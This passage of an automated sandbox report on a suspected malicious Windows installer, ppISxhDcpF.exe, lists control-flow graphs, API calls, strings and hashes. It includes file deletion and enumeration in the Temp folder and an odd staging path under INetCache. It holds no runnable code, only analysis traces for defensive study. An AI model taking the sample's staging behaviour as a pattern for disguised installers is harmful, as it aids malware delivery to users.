KiUserCallbackDispatcher call 40413b EnableWindow 297->328 300 403d19-403d1a 298->300 301 403d1c-403d1f 298->301 299->274 299->298 304 403d4a-403d4f call 4040f2 300->304 305 403d21-403d27 301->305 306 403d2d-403d32 301->306 304->293 308 403d68-403d7b SendMessageW 305->308 309 403d29-403d2b 305->309 306->308 310 403d34-403d3a 306->310 308->293 309->304 313 403d51-403d5a call 40140b 310->313 314 403d3c-403d42 call 40140b 310->314 313->293 323 403d5c-403d66 313->323 325 403d48 314->325 323->325 325->304 327->328 331 403f27-403f28 328->331 332 403f2a 328->332 333 403f2c-403f5a GetSystemMenu EnableMenuItem SendMessageW 331->333 332->333 334 403f5c-403f6d SendMessageW 333->334 335 403f6f 333->335 336 403f75-403fb3 call 40414e call 406055 lstrlenW call 406077 SetWindowTextW call 401389 334->336 335->336 336->275 345 403fb9-403fbb 336->345 345->275 346 403fc1-403fc5 345->346 347 403fe4-403ff8 DestroyWindow 346->347 348 403fc7-403fcd 346->348 347->283 350 403ffe-40402b CreateDialogParamW 347->350 348->274 349 403fd3-403fd9 348->349 349->275 351 403fdf 349->351 350->283 352 404031-404088 call 404119 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 350->352 351->274 352->274 357 40408a-4040a2 ShowWindow call 404165 352->357 357->283
                                                                                                                APIs
                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C7D
                                                                                                                • ShowWindow.USER32(?), ref: 00403C9A
                                                                                                                • DestroyWindow.USER32 ref: 00403CAE
                                                                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CCA
                                                                                                                • GetDlgItem.USER32(?,?), ref: 00403CEB
                                                                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CFF
                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 00403D06
                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 00403DB4
                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 00403DBE
                                                                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00403DD8
                                                                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E29
                                                                                                                • GetDlgItem.USER32(?,00000003), ref: 00403ECF
                                                                                                                • ShowWindow.USER32(00000000,?), ref: 00403EF0
                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F02
                                                                                                                • EnableWindow.USER32(?,?), ref: 00403F1D
                                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F33
                                                                                                                • EnableMenuItem.USER32(00000000), ref: 00403F3A
                                                                                                                • SendMessageW.USER32(?,?,00000000,00000001), ref: 00403F52
                                                                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F65
                                                                                                                • lstrlenW.KERNEL32(0042D268,?,0042D268,00433F00), ref: 00403F8E
                                                                                                                • SetWindowTextW.USER32(?,0042D268), ref: 00403FA2
                                                                                                                • ShowWindow.USER32(?,0000000A), ref: 004040D6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3282139019-0
                                                                                                                • Opcode ID: 3899400ff8e588ca518489e250fd262a6eccf12b27110187e4fcf668c4fe1b6b
                                                                                                                • Instruction ID: ea0d75974b1de0ff06d17ebe4cf6f8c3df4269cbbec1c2e45b889e3be151f72f
                                                                                                                • Opcode Fuzzy Hash: 3899400ff8e588ca518489e250fd262a6eccf12b27110187e4fcf668c4fe1b6b
                                                                                                                • Instruction Fuzzy Hash: 51C1AEB1604300ABDB206F61ED85E2B7AA8EB94706F50053EF641B61F0CB7999529B2D
                                                                                                                APIs
                                                                                                                  • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(?,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                • GlobalAlloc.KERNELBASE(?,00001CA4), ref: 10001C24
                                                                                                                • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                                                                                • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                                                                                • GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                                • GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                                • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                                                                                • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2008032542.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2008007393.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2008088602.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2008146266.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_10000000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$Free$lstrcpy$Alloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 4227406936-0
                                                                                                                • Opcode ID: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                                                                                • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                                                                                • Opcode Fuzzy Hash: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                                                                                • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 700 406077-406082 701 406084-406093 700->701 702 406095-4060ab 700->702 701->702 703 4060b1-4060be 702->703 704 4062c3-4062c9 702->704 703->704 705 4060c4-4060cb 703->705 706 4060d0-4060dd 704->706 707 4062cf-4062da 704->707 705->704 706->707 708 4060e3-4060ef 706->708 709 4062e5-4062e6 707->709 710 4062dc-4062e0 call 406055 707->710 711 4062b0 708->711 712 4060f5-406131 708->712 710->709 714 4062b2-4062bc 711->714 715 4062be-4062c1 711->715 716 406251-406255 712->716 717 406137-406142 GetVersion 712->717 714->704 715->704 720 406257-40625b 716->720 721 40628a-40628e 716->721 718 406144-406148 717->718 719 40615c 717->719 718->719 724 40614a-40614e 718->724 727 406163-40616a 719->727 725 40626b-406278 call 406055 720->725 726 40625d-406269 call 405f9c 720->726 722 406290-406298 call 406077 721->722 723 40629d-4062ae lstrlenW 721->723 722->723 723->704 724->719 729 406150-406154 724->729 738 40627d-406286 725->738 726->738 731 40616c-40616e 727->731 732 40616f-406171 727->732 729->719 734 406156-40615a 729->734 731->732 736 406173-406199 call 405f22 732->736 737 4061ad-4061b0 732->737 734->727 749 406238-40623c 736->749 750 40619f-4061a8 call 406077 736->750 739 4061c0-4061c3 737->739 740 4061b2-4061be GetSystemDirectoryW 737->740 738->723 742 406288 738->742 744 4061c5-4061d3 GetWindowsDirectoryW 739->744 745 40622e-406230 739->745 743 406232-406236 740->743 747 406249-40624f call 4062e9 742->747 743->747 743->749 744->745 745->743 748 4061d5-4061df 745->748 747->723 755 4061e1-4061e4 748->755 756 4061f9-40620f SHGetSpecialFolderLocation 748->756 749->747 753 40623e-406244 lstrcatW 749->753 750->743 753->747 755->756 758 4061e6-4061ed 755->758 759 406211-406228 SHGetPathFromIDListW CoTaskMemFree 756->759 760 40622a 756->760 761 4061f5-4061f7 758->761 759->743 759->760 760->745 761->743 761->756
                                                                                                                APIs
                                                                                                                • GetVersion.KERNEL32(00000000,0042C248,?,004051EB,0042C248,00000000,00000000,0041D820), ref: 0040613A
                                                                                                                • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004061B8
                                                                                                                • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 004061CB
                                                                                                                • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406207
                                                                                                                • SHGetPathFromIDListW.SHELL32(?,Call), ref: 00406215
                                                                                                                • CoTaskMemFree.OLE32(?), ref: 00406220
                                                                                                                • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406244
                                                                                                                • lstrlenW.KERNEL32(Call,00000000,0042C248,?,004051EB,0042C248,00000000,00000000,0041D820), ref: 0040629E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                • API String ID: 900638850-1230650788
                                                                                                                • Opcode ID: 815d4a1d12106e293d3587ab000579fb05f8572ec1ae3e21e1ffc4f2e4f9e7d3
                                                                                                                • Instruction ID: e2b9bd4c7d0941b93a588dc58e8d14d5200dcae9cd5da35c43f1ba43b89dddbc
                                                                                                                • Opcode Fuzzy Hash: 815d4a1d12106e293d3587ab000579fb05f8572ec1ae3e21e1ffc4f2e4f9e7d3
                                                                                                                • Instruction Fuzzy Hash: 79610371A00504EBDF20AF64CC40BAE37A5AF55324F16817FE942BA2D0D73D9AA1CB4D

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 762 405846-40586c call 405b11 765 405885-40588c 762->765 766 40586e-405880 DeleteFileW 762->766 768 40588e-405890 765->768 769 40589f-4058af call 406055 765->769 767 405a02-405a06 766->767 770 4059b0-4059b5 768->770 771 405896-405899 768->771 775 4058b1-4058bc lstrcatW 769->775 776 4058be-4058bf call 405a55 769->776 770->767 774 4059b7-4059ba 770->774 771->769 771->770 777 4059c4-4059cc call 406398 774->777 778 4059bc-4059c2 774->778 779 4058c4-4058c8 775->779 776->779 777->767 785 4059ce-4059e2 call 405a09 call 4057fe 777->785 778->767 782 4058d4-4058da lstrcatW 779->782 783 4058ca-4058d2 779->783 786 4058df-4058fb lstrlenW FindFirstFileW 782->786 783->782 783->786 802 4059e4-4059e7 785->802 803 4059fa-4059fd call 4051b4 785->803 788 405901-405909 786->788 789 4059a5-4059a9 786->789 790 405929-40593d call 406055 788->790 791 40590b-405913 788->791 789->770 793 4059ab 789->793 804 405954-40595f call 4057fe 790->804 805 40593f-405947 790->805 794 405915-40591d 791->794 795 405988-405998 FindNextFileW 791->795 793->770 794->790 798 40591f-405927 794->798 795->788 801 40599e-40599f FindClose 795->801 798->790 798->795 801->789 802->778 806 4059e9-4059f8 call 4051b4 call 405ef6 802->806 803->767 815 405980-405983 call 4051b4 804->815 816 405961-405964 804->816 805->795 807 405949-405952 call 405846 805->807 806->767 807->795 815->795 819 405966-405976 call 4051b4 call 405ef6 816->819 820 405978-40597e 816->820 819->795 820->795
                                                                                                                APIs
                                                                                                                • DeleteFileW.KERNELBASE(?,?,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ppISxhDcpF.exe"), ref: 0040586F
                                                                                                                • lstrcatW.KERNEL32(0042F270,\*.*,0042F270,?,?,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ppISxhDcpF.exe"), ref: 004058B7
                                                                                                                • lstrcatW.KERNEL32(?,0040A014,?,0042F270,?,?,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ppISxhDcpF.exe"), ref: 004058DA
                                                                                                                • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ppISxhDcpF.exe"), ref: 004058E0
                                                                                                                • FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ppISxhDcpF.exe"), ref: 004058F0
                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,0040A300,0000002E), ref: 00405990
                                                                                                                • FindClose.KERNEL32(00000000), ref: 0040599F
                                                                                                                Strings
                                                                                                                • \*.*, xrefs: 004058B1
                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405853
                                                                                                                • "C:\Users\user\Desktop\ppISxhDcpF.exe", xrefs: 0040584F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                • String ID: "C:\Users\user\Desktop\ppISxhDcpF.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                • API String ID: 2035342205-2702810459
                                                                                                                • Opcode ID: 93e21722a180473d247efaee9d9481d6b8afddc4eaefe0f7bae919d4fb0dd793
                                                                                                                • Instruction ID: 3422579b2d55acfa562187ab3f611d485c5dde76635b84dd87a68d04928cc13f
                                                                                                                • Opcode Fuzzy Hash: 93e21722a180473d247efaee9d9481d6b8afddc4eaefe0f7bae919d4fb0dd793
                                                                                                                • Instruction Fuzzy Hash: 4541F270900A04EADF21AB618C89BBF7678EF41724F14823BF801B51D1D77C49859E6E
                                                                                                                APIs
                                                                                                                • CoCreateInstance.OLE32(004085A8,?,00000001,00408598,?,?,00000045,000000CD,00000002,000000DF,?), ref: 00402114
                                                                                                                Strings
                                                                                                                • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\nonactor, xrefs: 00402154
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateInstance
                                                                                                                • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\nonactor
                                                                                                                • API String ID: 542301482-1427884202
                                                                                                                • Opcode ID: 146cf55ee0b1f2e236d84f42d428f2d21f191b8343958f8e7f458ea2ed3a719d
                                                                                                                • Instruction ID: 1a24425b30559046e2e45c95ea19553466384e890d2313978d3609d0df4c75fa
                                                                                                                • Opcode Fuzzy Hash: 146cf55ee0b1f2e236d84f42d428f2d21f191b8343958f8e7f458ea2ed3a719d
                                                                                                                • Instruction Fuzzy Hash: 3E412C71A00208AFCF00DFA4CD88AAD7BB5FF48314B24457AF515EB2D1DBB99A41CB54
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNELBASE(?,004302B8,0042FA70,00405B5A,0042FA70,0042FA70,00000000,0042FA70,0042FA70, 4Wu,?,C:\Users\user\AppData\Local\Temp\,00405866,?,75573420,C:\Users\user\AppData\Local\Temp\), ref: 004063A3
                                                                                                                • FindClose.KERNEL32(00000000), ref: 004063AF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                • String ID:
                                                                                                                • API String ID: 2295610775-0
                                                                                                                • Opcode ID: 26ecc7b94827cd81dbcd23612912991a36a9a8e6a086a5859bf6985d6c65a255
                                                                                                                • Instruction ID: 3b49439eae3a82ac9864466e1d27f896d1b9bc200308884f11696e1f8cd425af
                                                                                                                • Opcode Fuzzy Hash: 26ecc7b94827cd81dbcd23612912991a36a9a8e6a086a5859bf6985d6c65a255
                                                                                                                • Instruction Fuzzy Hash: 3AD012755081209BC28117386E0C84B7A5C9F193317115B36FE6BF22E0CB388C6786DC
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040280A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileFindFirst
                                                                                                                • String ID:
                                                                                                                • API String ID: 1974802433-0
                                                                                                                • Opcode ID: e4085221f00f99ea28b48dcf57fb83f2b364f19060254b57e6142408856da5b4
                                                                                                                • Instruction ID: 801a3ec73fa0f8c7b921e95059ce856047ace0635644dd2743fa1cdad283ab42
                                                                                                                • Opcode Fuzzy Hash: e4085221f00f99ea28b48dcf57fb83f2b364f19060254b57e6142408856da5b4
                                                                                                                • Instruction Fuzzy Hash: C5F08C71A005149BCB01EFA4DE49AAEB378FF04324F2045BBF105F31E1E7B89A409B29

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 360 40389e-4038b6 call 40642b 363 4038b8-4038c3 GetUserDefaultUILanguage call 405f9c 360->363 364 4038ca-403901 call 405f22 360->364 367 4038c8 363->367 370 403903-403914 call 405f22 364->370 371 403919-40391f lstrcatW 364->371 369 403924-40394d call 403b74 call 405b11 367->369 377 403953-403958 369->377 378 4039df-4039e7 call 405b11 369->378 370->371 371->369 377->378 379 40395e-403986 call 405f22 377->379 384 4039f5-403a1a LoadImageW 378->384 385 4039e9-4039f0 call 406077 378->385 379->378 386 403988-40398c 379->386 388 403a9b-403aa3 call 40140b 384->388 389 403a1c-403a4c RegisterClassW 384->389 385->384 390 40399e-4039aa lstrlenW 386->390 391 40398e-40399b call 405a36 386->391 400 403aa5-403aa8 388->400 401 403aad-403ab8 call 403b74 388->401 392 403a52-403a96 SystemParametersInfoW CreateWindowExW 389->392 393 403b6a 389->393 398 4039d2-4039da call 405a09 call 406055 390->398 399 4039ac-4039ba lstrcmpiW 390->399 391->390 392->388 397 403b6c-403b73 393->397 398->378 399->398 404 4039bc-4039c6 GetFileAttributesW 399->404 400->397 412 403b41-403b49 call 405287 401->412 413 403abe-403ad8 ShowWindow call 4063bf 401->413 407 4039c8-4039ca 404->407 408 4039cc-4039cd call 405a55 404->408 407->398 407->408 408->398 418 403b63-403b65 call 40140b 412->418 419 403b4b-403b51 412->419 420 403ae4-403af6 GetClassInfoW 413->420 421 403ada-403adf call 4063bf 413->421 418->393 419->400 422 403b57-403b5e call 40140b 419->422 425 403af8-403b08 GetClassInfoW RegisterClassW 420->425 426 403b0e-403b31 DialogBoxParamW call 40140b 420->426 421->420 422->400 425->426 430 403b36-403b3f call 4037ee 426->430 430->397
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,?,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                                  • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                                • GetUserDefaultUILanguage.KERNELBASE(00000002,75573420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\ppISxhDcpF.exe"), ref: 004038B8
                                                                                                                  • Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9
                                                                                                                • lstrcatW.KERNEL32(1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,75573420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\ppISxhDcpF.exe"), ref: 0040391F
                                                                                                                • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,75573420), ref: 0040399F
                                                                                                                • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 004039B2
                                                                                                                • GetFileAttributesW.KERNEL32(Call), ref: 004039BD
                                                                                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving), ref: 00403A06
                                                                                                                • RegisterClassW.USER32(00433EA0), ref: 00403A43
                                                                                                                • SystemParametersInfoW.USER32(?,00000000,?,00000000), ref: 00403A5B
                                                                                                                • CreateWindowExW.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A90
                                                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00403AC6
                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403AF2
                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403AFF
                                                                                                                • RegisterClassW.USER32(00433EA0), ref: 00403B08
                                                                                                                • DialogBoxParamW.USER32(?,00000000,00403C41,00000000), ref: 00403B27
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                                                                • String ID: "C:\Users\user\Desktop\ppISxhDcpF.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                • API String ID: 606308-2621852434
                                                                                                                • Opcode ID: 1b384d1f77ad73b90eb4ead2ce7446fbf64eb66176232e5d4eff2d39ff252f29
                                                                                                                • Instruction ID: 3415ad5ee5f1eed3d2c0e447cb4c4d8a0153f3b0974deb3f023f39c7f2583bdf
